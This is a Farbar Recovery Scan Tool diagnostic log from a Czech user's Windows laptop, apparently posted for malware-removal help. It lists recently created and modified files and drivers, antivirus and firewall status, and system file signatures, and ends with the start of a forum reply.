2017-05-31 16:47 - 2017-05-31 16:47 - 00042696 _____ C:\Windows\system32\Drivers\lirsgt.sys
2017-05-31 16:34 - 2017-05-31 16:34 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Software602
2017-05-31 16:20 - 2017-05-31 16:21 - 00000000 ____D C:\Users\Vojtěch\Downloads\Nová složka
2017-05-29 10:36 - 2017-05-29 11:20 - 581858534 _____ C:\Users\Vojtěch\Downloads\01x01 Zima se blizi.avi
2017-05-23 13:41 - 2017-05-23 13:41 - 03781252 _____ C:\Users\Vojtěch\Downloads\TZB-ČÁST (1).pdf
2017-05-23 13:40 - 2017-05-23 13:41 - 24624656 _____ C:\Users\Vojtěch\Downloads\POZEMKO.pdf
2017-05-21 12:44 - 2017-05-21 12:44 - 00000165 ____H C:\Users\Vojtěch\Desktop\~$Vyúčtování SolarCell Svoboda.xlsx
2017-05-20 17:53 - 2017-05-20 17:53 - 00163644 _____ (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) C:\Windows\SysWOW64\Drivers\SECDRV.SYS
2017-05-20 17:40 - 2017-05-20 17:40 - 00001902 _____ C:\Users\Public\Desktop\Call of Duty(R) 2 Singleplayer.lnk
2017-05-20 17:40 - 2017-05-20 17:40 - 00001902 _____ C:\Users\Public\Desktop\Call of Duty(R) 2 Multiplayer.lnk
2017-05-20 17:40 - 2017-05-20 17:40 - 00000293 _____ C:\Windows\game.ini
2017-05-20 17:40 - 2017-05-20 17:40 - 00000000 __SHD C:\Windows\ftpcache
2017-05-20 17:40 - 2017-05-20 17:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Activision
2017-05-20 17:36 - 2017-05-20 17:36 - 00000000 ____D C:\Program Files (x86)\Activision
2017-05-20 17:33 - 2017-05-20 17:33 - 00000000 ___HD C:\$AV_ASW
2017-05-20 17:19 - 2015-07-07 15:51 - 00000000 ____D C:\Users\Vojtěch\Downloads\call of duty 2 cz
2017-05-18 21:42 - 2017-05-18 21:42 - 01631604 _____ C:\Users\Vojtěch\Downloads\Hodnocení BP.pdf
2017-05-15 18:15 - 2017-05-15 18:15 - 07894252 _____ C:\Users\Vojtěch\Downloads\PREZENTACE-BAKALÁŘKA.pptx
2017-05-13 21:20 - 2017-05-13 21:20 - 00001503 _____ C:\Users\Vojtěch\Desktop\age3y – zástupce.lnk
2017-05-13 21:18 - 2017-05-13 21:18 - 00001503 _____ C:\Users\Vojtěch\Desktop\age3x – zástupce.lnk
2017-05-10 20:04 - 2017-05-10 20:21 - 00010752 _____ C:\Users\Vojtěch\Desktop\Mama tabulka.xlsx
2017-05-10 13:04 - 2017-05-10 13:05 - 10265563 _____ C:\Users\Vojtěch\Downloads\pozemni-stavitelstvi-bc.pdf
2017-05-10 12:40 - 2017-04-29 00:44 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-10 12:40 - 2017-04-29 00:44 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-10 12:01 - 2017-03-30 15:15 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-10 11:24 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-10 11:24 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-10 11:24 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-10 11:23 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-10 11:23 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-10 11:23 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-10 11:23 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-10 11:23 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-10 11:23 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-10 11:23 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-10 11:23 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-10 11:23 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-10 11:23 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-10 11:23 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-10 11:23 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-10 11:23 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-10 11:23 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-10 11:23 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-10 11:23 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-10 11:23 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-10 11:23 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-10 11:23 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-10 11:23 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-10 11:23 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-10 11:23 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-10 11:23 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-10 11:23 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-10 11:23 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-10 11:23 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-10 11:23 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-10 11:23 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-10 11:23 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-10 11:23 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-10 11:23 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-10 11:23 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-10 11:23 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-10 11:23 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-10 11:23 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-10 11:23 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-10 11:23 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-10 11:23 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-10 11:23 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-10 11:23 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-10 11:23 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-10 11:23 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-10 11:23 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-10 11:23 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-10 11:23 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-10 11:23 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-10 11:23 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-10 11:23 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-10 11:23 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-10 11:23 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-10 11:23 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-10 11:23 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-10 11:23 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-10 11:23 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-10 11:23 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-10 11:23 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 11:23 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\wmitomi.dll
2017-05-10 11:23 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2017-05-10 11:23 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2017-05-10 11:23 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmitomi.dll
2017-05-10 11:23 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2017-05-10 11:23 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2017-05-10 11:23 - 2017-03-11 21:34 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-05-10 11:23 - 2017-03-11 21:32 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-05-10 11:23 - 2017-03-11 21:32 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-05-10 11:23 - 2017-03-11 20:49 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-10 11:23 - 2017-03-11 19:58 - 01437696 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-10 11:23 - 2017-03-11 19:54 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-10 11:23 - 2017-03-11 01:38 - 02017624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-10 11:23 - 2017-03-11 01:38 - 00275800 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2017-05-10 11:23 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\wisp.dll
2017-05-10 11:23 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wisp.dll
2017-05-10 11:23 - 2017-03-08 04:44 - 00448285 _____ C:\Windows\system32\ApnDatabase.xml
2017-05-09 22:29 - 2017-05-09 22:29 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-08 17:55 - 2017-05-08 17:55 - 00000000 ____D C:\Users\Vojtěch\Documents\EVE
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\CCP
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\.QtWebEngineProcess
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\.EVE
2017-05-08 11:00 - 2012-08-07 11:27 - 00000507 _____ C:\Users\Vojtěch\Desktop\CDKeye + tipy.TXT
2017-05-05 13:33 - 2017-05-05 13:54 - 00000000 ____D C:\Program Files (x86)\Warcraft III
2017-05-05 13:33 - 2017-05-05 13:41 - 00085516 _____ C:\Windows\War3Unin.dat
2017-05-05 13:33 - 2017-05-05 13:38 - 00139264 _____ (Blizzard Entertainment) C:\Windows\War3Unin.exe
2017-05-05 13:33 - 2017-05-05 13:38 - 00002829 _____ C:\Windows\War3Unin.pif
2017-05-05 13:33 - 2017-05-05 13:38 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Warcraft III
2017-05-05 13:33 - 2017-05-05 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Warcraft III
2017-05-05 13:27 - 2017-05-05 13:28 - 00000000 ____D C:\Users\Vojtěch\Desktop\Warcraft 3 Complet
2017-05-05 13:21 - 2017-05-05 13:21 - 00001498 _____ C:\Users\Vojtěch\Desktop\age3 – zástupce.lnk
2017-05-05 11:00 - 2017-05-05 11:00 - 00137517 _____ C:\Users\Vojtěch\Downloads\harmonogram-promoci.pdf
2017-05-04 11:39 - 2017-05-04 11:39 - 00000000 ___HD C:\Windows\msdownld.tmp
2017-05-04 11:39 - 2017-05-04 11:39 - 00000000 ____D C:\Program Files (x86)\MSXML 4.0
2017-05-04 11:39 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-05-04 11:39 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-05-04 11:39 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2017-05-04 11:39 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-05-04 11:39 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2017-05-04 11:38 - 2017-05-04 11:39 - 00000000 ____D C:\Windows\SysWOW64\directx
2017-05-04 11:37 - 2017-05-04 11:37 - 00000000 ____D C:\ProgramData\Age of Empires 3
2017-05-04 11:33 - 2017-05-04 11:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Age Of Empires 3 CZ
2017-05-04 11:26 - 2017-05-04 11:33 - 00000000 ____D C:\Program Files (x86)\Age Of Empires 3
2017-05-04 00:35 - 2017-05-04 02:56 - 2546663424 _____ C:\Users\Vojtěch\Downloads\Age-Of-Empires-III---Kompletní-edice-CZ---t2k9.iso
2017-05-03 13:12 - 2017-05-03 15:09 - 00000000 ____D C:\Warcraft 1.07
2017-05-03 13:10 - 2017-05-03 16:04 - 00000000 ____D C:\Warcraft III_1.20
2017-05-03 12:24 - 2017-05-04 11:40 - 00000000 ____D C:\Users\Vojtěch\Documents\My Games
2017-05-03 12:05 - 2017-05-03 12:05 - 00000991 _____ C:\Users\Vojtěch\Desktop\WorldOfTanks – zástupce.lnk

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-02 09:29 - 2014-08-23 03:18 - 00739924 _____ C:\Windows\system32\perfh005.dat
2017-06-02 09:29 - 2014-08-23 03:18 - 00151610 _____ C:\Windows\system32\perfc005.dat
2017-06-02 09:29 - 2014-03-18 12:03 - 01745984 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-02 09:29 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-02 09:23 - 2016-11-03 13:25 - 00000000 ____D C:\Users\Vojtěch\Desktop\PROGRAMY
2017-06-02 09:23 - 2016-07-19 22:16 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3751293310-3690691840-2036008392-1001
2017-06-02 08:48 - 2016-07-20 21:33 - 00003978 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{8A9462CD-B6C3-478F-A1B7-CBA83041838C}
2017-06-02 08:47 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2017-06-02 08:46 - 2016-11-02 15:10 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Akamai
2017-06-02 08:46 - 2016-07-19 22:18 - 00000000 ___DO C:\Users\Vojtěch\OneDrive
2017-06-01 21:32 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-01 21:28 - 2017-02-09 12:54 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-06-01 21:12 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-01 12:43 - 2017-04-10 20:25 - 00000000 ____D C:\World_of_Tanks
2017-06-01 12:15 - 2016-10-05 11:29 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\CrashDumps
2017-06-01 10:41 - 2014-08-23 02:56 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-31 16:37 - 2017-04-10 19:57 - 00024925 _____ C:\Users\Vojtěch\Desktop\Vyúčtování SolarCell Svoboda.xlsx
2017-05-31 16:17 - 2017-04-07 15:58 - 00000000 ____D C:\Users\Vojtěch\Downloads\fota
2017-05-31 15:21 - 2016-07-19 22:11 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Packages
2017-05-31 13:27 - 2016-10-06 12:40 - 00003892 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1475750441
2017-05-31 13:27 - 2016-10-06 12:40 - 00001063 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-30 09:22 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\NDF
2017-05-29 13:01 - 2016-11-10 20:06 - 00000000 ____D C:\Users\Vojtěch\Desktop\rozvaděč
2017-05-29 13:00 - 2017-04-27 11:05 - 00000000 ____D C:\Users\Vojtěch\Desktop\fotbal
2017-05-29 12:59 - 2016-11-30 02:07 - 00000000 ____D C:\Users\Vojtěch\Desktop\BAKALÁŘSKÁ PRÁCE
2017-05-26 00:08 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-26 00:06 - 2014-08-23 03:24 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-05-23 10:14 - 2016-11-04 22:44 - 00000000 ____D C:\Windows\system32\MRT
2017-05-23 10:12 - 2016-11-04 22:44 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-22 02:21 - 2016-07-19 22:08 - 00000000 ____D C:\Users\Vojtěch
2017-05-17 23:18 - 2016-10-05 11:25 - 00002219 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-16 15:30 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-15 19:05 - 2016-10-14 14:31 - 00000000 ____D C:\Users\Administrator.ERZA-NTB
2017-05-12 22:30 - 2016-10-06 12:37 - 00158880 _____ (AVAST Software) C:\Windows\system32\Drivers\aswstm.sys
2017-05-11 10:43 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\rescache
2017-05-11 10:19 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-10 12:36 - 2013-08-22 16:44 - 00557080 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-10 12:30 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-10 10:31 - 2017-05-02 01:10 - 00000000 ____D C:\Program Files\PDFCreator
2017-05-09 22:29 - 2016-10-06 12:37 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-09 22:28 - 2016-10-06 12:40 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-09 22:28 - 2016-10-06 12:37 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys

==================== Files in the root of some directories =======

2014-08-23 03:04 - 2014-08-23 03:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-11-03 13:16 - 2016-11-03 13:16 - 0000153 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc

Some files in TEMP:
====================
2016-10-19 17:11 - 2016-10-19 17:11 - 2458672 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Vojtěch\AppData\Local\Temp\libeay32.dll
2016-10-19 17:11 - 2016-10-19 17:11 - 0970912 _____ (Microsoft Corporation) C:\Users\Vojtěch\AppData\Local\Temp\msvcr120.dll
2017-06-02 08:55 - 2017-06-02 08:55 - 13460656 _____ (Reimage) C:\Users\Vojtěch\AppData\Local\Temp\ReimagePackage.exe
2016-10-19 17:11 - 2016-10-19 17:11 - 0772672 _____ () C:\Users\Vojtěch\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-05-25 23:22

==================== End of FRST.txt ============================



===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===

==================== Drive and Memory info ===================

Drive c: (Acer) (Fixed) (Total:913.67 GB) (Free:802.16 GB) NTFS
Drive f: () (Removable) (Total:58.59 GB) (Free:23.03 GB) exFAT

Available physical RAM: 2053.97 MB
Total physical RAM: 3987.27 MB
Percentage of memory in use: 48%

==================== MBR and Partition Table ==================

Disk: 0 (Size: 931.5 GB) (Disk ID: E1536A17)
Disk: 1 (Size: 58.6 GB) (Disk ID: 00000000)

==================== Scheduled Tasks (whitelisted) ==================

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Alternate Data Streams (whitelisted) ==================


==================== Security Center ==================

AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}



===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)


***** Velikost "Plochy" *****

Velikost slozky "C:\Users\VojtŘch\Desktop" je 7788 MB.


***** Startup Programs *****


***** Firewall rules *****

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]


***** System Restore *****

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"Generalize_DisableSR"=dword:00000000


==================== End Of Log ==============================

[JaRon]

ahoj,
